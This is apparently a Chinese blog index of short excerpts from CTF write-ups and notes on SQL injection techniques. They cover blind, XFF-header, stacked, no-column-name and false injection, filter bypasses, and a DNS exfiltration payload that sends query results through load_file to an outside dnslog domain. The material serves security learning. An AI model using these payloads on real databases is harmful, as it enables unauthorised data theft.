知识点:information_schema.tables变形。无列名比较注入 fuzz一下 发现可用^异或，可以进行盲注 因为information_schema被过滤了,我们要获得表名可以用 sys.schema_table_statistics_w...

知识点:sql盲注 XFF注入 知识点很简单,就是从xff头进行sql注入.只是这个模型没见过:xff输入一个sql注入payload后提交后,然后再发包换一个xff头过去,会显示last ip:... ,然后再发一个xff一样的包,若sql注...

知识点: sql盲注 二分法盲注 文件上传 .bak泄露 进来后常规思路，找robots.txt文件 提示bak文件,同时我们在主界面的源代码中看见了可疑的image.php 我们访问image.php.bak，得到image.php...

知识点:sql_mode,堆叠注入 [SUCTF 2019]EasySQL1 知识点:sql_mode,堆叠注入 sql_mode: 一个参数，用于控制sql语句的某些行为. 如set sql_mode=PIPES_AS_CONCAT的意思就是将"||"视为字符串...

可用于information_schema被禁用时(具体来讲是知道了库，表名却不知道列名 无列名注入 可用于information_schema被禁用时(具体来讲是知道了库，表名却不知道列名 先来讲讲原理: 我们直接select1,...

可以使用handler命令来代替select。 mysql查询表中数据除了可以用select还可以用handler。它的语法如下 HANDLER tbl_name OPEN [ [AS] alias] //获取句柄 HANDLER tbl_name READ index_name { = |...

实际操作时，你想要登入后台时，当你发现sql语句结构是这种select * from 'table' where psw=md5($_['psw'],true) ,会非常蛋疼。 那么怎么绕过呢 绕过 md5(str,true). 来进行注入 实际操作时，你...

dns注入 payload: select load_file(concat(“\\\\",payload,".域名\\a"); 具体步骤： 在http://www.dnslog.cn该网站上取得一个域名，在file_priv是空的情况下,使用上面的payload，loa...

原理：sql中字符串和数字进行比较时，字符串会被转换成浮点数，若字符串前几位不是数字则会被转换成0，若前几位有数字则会被转换成那几个数字。 false注入 原理： sql中字符串和数字进行比较时，字...

SQL注入： 1.常用函数及操作符： version()// mysql版本 user（）// 数据库用户名 database（）//数据库名 @@datadir //数据库路径 @@version_compile_os //操作系统和版本 concat(s...